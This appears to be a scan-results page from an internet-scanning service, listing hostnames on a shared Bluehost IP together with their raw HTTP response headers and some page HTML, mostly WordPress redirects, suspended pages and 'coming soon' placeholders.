HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:47:09 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Vary: accept,content-type X-Redirect-By: WordPress Location: https://footballnovice.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:47:03 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.adultseo-net.wpcats.com
2024-09-16 09:46
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:46:43 GMT Server: Apache Location: https://www.adultseo-net.wpcats.com/cgi-sys/suspendedpage.cgi Content-Length: 245 Connection: close Content-Type: text/html; charset=iso-8859-1 Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.adultseo-net.wpcats.com/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.casaesperanza.com.gt
2024-09-16 09:46
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:46:31 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://casaesperanza.com.gt/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:46:27 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.emh.bxt.mybluehost.me
2024-09-16 09:46
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:46:04 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 244 Location: https://mail.emh.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi X-Server-Cache: true X-Proxy-Cache: MISS host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://mail.emh.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.atlantaicecreamfestival.com
2024-09-16 09:46
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:46:03 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://www.atlantaicecreamfestival.com/ host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.meliportes.com
2024-09-16 09:45
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:45:52 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://meliportes.com/ Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:50:50 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 3 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.emh.bxt.mybluehost.me
2024-09-16 09:45
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:45:51 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 243 Location: https://www.emh.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi X-Server-Cache: true X-Proxy-Cache: MISS host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.emh.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · hopeorchards.com
2024-09-16 09:45
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:45:25 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://hopeorchards.com/wp-json/>; rel="https://api.w.org/", <https://hopeorchards.com/wp-json/wp/v2/pages/5010>; rel="alternate"; title="JSON"; type="application/json", <https://hopeorchards.com/>; rel=shortlink Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.trentonthemiller.com
2024-09-16 09:45
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:45:16 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://trentonthemiller.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:45:13 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · gbl.nfp.mybluehost.me
2024-09-16 09:45
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:45:09 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://byeclutterhellolove.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:45:05 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · joyalyssaday.com
2024-09-16 09:44
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:44:27 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: sameorigin Link: <https://joyalyssaday.com/wp-json/>; rel="https://api.w.org/", <https://joyalyssaday.com/wp-json/wp/v2/pages/78>; rel="alternate"; title="JSON"; type="application/json", <https://joyalyssaday.com/>; rel=shortlink Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:44:26 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.imsignaturecrafts.com
2024-09-16 09:44
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:44:25 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://imsignaturecrafts.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:44:22 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.ura.vhl.mybluehost.me
2024-09-16 09:44
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:80 · mail.luxiessentials.net
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:44:00 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://fwb.ylh.mybluehost.me/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:44:00 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · vbv.oui.mybluehost.me
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:44:01 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Pingback: https://wofhealthandwellnessxp.org/xmlrpc.php X-Redirect-By: WordPress Location: https://wofhealthandwellnessxp.org/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:54 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.cyberloomtechnologies.com
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:43:52 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://cyberloom.org/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:52 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.mhj.nce.mybluehost.me
2024-09-16 09:43
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · spencemarineconstructionllc-com.harborhorticulture.com
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:43:35 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://spencemarineconstructionllc.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:35 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.tfi-solutions.com
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:43:36 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://volterreenvironmental.com/ host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · moldlymemcasohmy.com
2024-09-16 09:43
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:43:32 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 238 Location: https://moldlymemcasohmy.com/cgi-sys/suspendedpage.cgi X-Server-Cache: true X-Proxy-Cache: MISS host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://moldlymemcasohmy.com/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.billrutlandmusic.com
2024-09-16 09:43
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:43:31 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://billrutlandmusic.com/wp-json/>; rel="https://api.w.org/" Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:28 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: Bill Rutland Music <!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if !(IE 7) & !(IE 8)]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://billrutlandmusic.com/xmlrpc.php"> <title>Bill Rutland Music</title> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='dns-prefetch' href='//billrutlandmusic.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//i0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="Bill Rutland Music » Feed" href="https://billrutlandmusic.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Bill Rutland Music » Comments Feed" href="https://billrutlandmusic.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/billrutlandmusic.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e})Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.hiddenicons.co.nz
2024-09-16 09:43
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:43:26 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://www.hiddenicons.co.nz/wp-json/>; rel="https://api.w.org/", <https://www.hiddenicons.co.nz/wp-json/wp/v2/pages/4>; rel="alternate"; title="JSON"; type="application/json", <https://www.hiddenicons.co.nz/>; rel=shortlink Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:25 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.claudianoriegabernstein.com
2024-09-16 09:43
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:43:25 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://claudianoriegabernstein.com/ host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 3 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Set-Cookie: lp_session_guest=g-66e7fdbd1512f; expires=Wed, 18 Sep 2024 09:43:25 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: mailchimp_landing_site=https%3A%2F%2Fclaudianoriegabernstein.com%2F; expires=Mon, 14 Oct 2024 09:43:25 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · teresasqualitycomfortcare.com
2024-09-16 09:42
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:43:01 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=edge Cache-Control: no-store, no-cache, must-revalidate Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:43:00 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: Teresa's Quality Comfort Care — Coming Soon <!DOCTYPE html> <html lang="en-US"> <head> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow" /> <title>Teresa's Quality Comfort Care — Coming Soon</title> <script src="https://teresasqualitycomfortcare.com/wp-includes/js/jquery/jquery.js"></script> <style type="text/css">* { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-box-sizing: border-box; } body { background-color: white; color: black; overflow-x: hidden; margin: 0; } #wrap { align-items: center; display: flex; justify-content: center; min-height: 100vh; } .content { flex: 1; margin: auto 5%; padding: 0; text-align: center; max-width: 420px; } footer { width: 100%; position: fixed; bottom: 0; left: 0; } footer p { text-align: center; } .btn { background: black; background-image: none; border: 1px solid black; box-shadow: none; color: white; cursor: pointer; display: inline-block; font-size: 14px; font-weight: 400; line-height: 1.5; margin-top: 10px; padding: 6px 30px; text-align: center; text-decoration: none; touch-action: manipulation; transition: all 0.2s ease; user-select: none; vertical-align: middle; white-space: nowrap; } .status-message { display: none; }</style> <link rel="stylesheet" href="https://teresasqualitycomfortcare.com/wp-content/plugins/bluehost-wordpress-plugin/assets/styles/coming-soon.css?v=3.14.9" /> </head> <body> <div id="wrap"> <main class="content"> <div class="subscription_widget"> <h1>Coming Soon!</h1> <h2>A New WordPress Site</h2> <p class="comingsoon_links"><a href="https://www.bluehost.com/blog/how-to-create-a-website-guide/" target="_blank" rel="noopener noreferrer nofollow">How to Build a Website: A Practical Guide to WordPress on Bluehost</a><br /><a href="https://www.bluehost.com/blog/how-to-migrate-a-wordpress-website-to-a-new-server/" target="_blank" rel="noopener noreferrer nofollow">How to Migrate a Website to Bluehost?</a><br /><a href="https://www.bluehost.com/hosting/shared" target="_blank" rel="noopener noreferrer nofollow">Why choose Bluehost for your WordPress site?</a><br /></p> </div> </main> </div> <footer> <p class="text-center"> A <a href="https://bluehost.com?utm_source=coming-soon-template&utm_medium=bluehost_plugin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a> powered website. Is this your website? Log in to <a href="https://teresasqualitycomfortcare.com/wp-login.php">WordPress</a> or <a href="https://my.bluehost.com/web-hosting/cplogin" target="_blank" rel="noopener noreferrer nofollow">Bluehost</a>. </p> </footer> </body> </html>Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.yds.bxt.mybluehost.me
2024-09-16 09:42
HTTP/1.1 302 Found Date: Mon, 16 Sep 2024 09:43:00 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=iso-8859-1 Content-Length: 243 Location: https://www.yds.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi X-Server-Cache: true X-Proxy-Cache: MISS host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Page title: 302 Found <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://www.yds.bxt.mybluehost.me/cgi-sys/suspendedpage.cgi">here</a>.</p> </body></html>
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · mail.wheatleyinstitute.com
2024-09-16 09:42
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:42:53 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-UA-Compatible: IE=edge X-Redirect-By: WordPress Location: https://wheatleyinstitute.com/ Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:47:51 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.sacramentobravesyouth.org
2024-09-16 09:42
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:42:50 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://sacramentobravesyouth.org/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:42:47 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Set-Cookie: nfdbrandname=bluehost; expires=Thu, 14 Sep 2034 09:42:49 GMT; Max-Age=315360000; path=/
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.theeverydaygourmet-us.kimbroughdaniels.com
2024-09-16 09:42
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:42:44 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://theeverydaygourmet.us/ Cache-Control: max-age=300 Expires: Mon, 16 Sep 2024 09:47:42 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · www.gaw.vvo.mybluehost.me
2024-09-16 09:42
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:42:16 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://gaw.vvo.mybluehost.me/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:42:11 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · csl.kei.mybluehost.me
2024-09-16 09:42
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · elevatortoheaven.com
2024-09-16 09:41
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:42:03 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 Vary: accept,content-type X-UA-Compatible: IE=edge X-Redirect-By: WordPress Location: https://www.elevatortoheaven.com/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:42:00 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · set.bnm.mybluehost.me
2024-09-16 09:41
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:41:59 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Link: <https://urbanagricultureinalabama.org/wp-json/>; rel="https://api.w.org/" Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:41:58 GMT Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:80 · mot.etu.mybluehost.me
2024-09-16 09:41
HTTP/1.1 301 Moved Permanently Date: Mon, 16 Sep 2024 09:41:21 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Content-Length: 0 X-Redirect-By: WordPress Location: https://inhalenashville.org/ Cache-Control: max-age=7200 Expires: Mon, 16 Sep 2024 11:41:21 GMT host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS
Found 16 hours ago by HttpPluginCreate report
-
Open service 162.241.253.33:443 · ageconfidential.com
2024-09-16 09:41
HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 09:41:21 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache; private Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress X-Server-Cache: true X-Proxy-Cache: MISS Transfer-Encoding: chunked Page title: Age Confidential <!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- SEO --> <title>Age Confidential</title> <!-- og meta for facebook, googleplus --> <meta property="og:title" content="Age Confidential"/> <meta property="og:description" content=""/> <meta property="og:url" content="https://ageconfidential.com"/> <meta property="og:type" content="website" /> <meta property="og:image" content=""/> <!-- twitter meta --> <meta name="twitter:card" content="summary_large_image"/> <meta name="twitter:title" content="Age Confidential"/> <meta name="twitter:description" content=""/> <meta name="twitter:url" content="https://ageconfidential.com"/> <meta name="twitter:image" content=""/> <link rel="stylesheet" href="https://ageconfidential.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.10" type="text/css" media="all"> <link rel="stylesheet" href="https://ageconfidential.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css"> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css" rel="stylesheet" > <link href="https://fonts.googleapis.com/css?family=Oxygen:400,700,400&subset=latin-ext,latin" rel="stylesheet"> <style> @font-face {font-family: "margo-webfont"; src: url("https://ageconfidential.com/wp-content/uploads/2024/02/margo-webfont.woff") format("woff");} </style> <style> body,input {font-family:'Oxygen', 'sans-serif';color:#111111;} .social-list {background-color: rgba(136,115,95,1);} a {color:#111111;} h1,h2,h3,h4,h5,h6 {font-family:'margo-webfont', 'sans-serif';} body {font-size:16px; letter-spacing: 2px; font-weight:400;; } h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.75em;letter-spacing: 0px; font-weight:Not Applicable;font-style: normal;; } h1 {font-weight:Not Applicable;font-style: normal;;} </style> <style> .wp-video {margin: 0 auto;} .wp-video-shortcode {max-width: 100%;} .grecaptcha-badge {display: none!important;} .text-logo {display: inline-block;} #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;} #counter.expired {display: none; } input, button { box-shadow: inset 0 0 0 0 !important; -webkit-box-shadow: inset 0 0 0 0 !important; -webkit-appearance: none; outline: none; } </style> <style>.social-list i { color: #fff; } .text-logo { margin-bottom: -20px; } #cookie-notice .cookie-notice-container { display: none !important; } .social-list a:hover i { -webkit-animation: none; animation: none; } .social-list a:hover i { opacity: 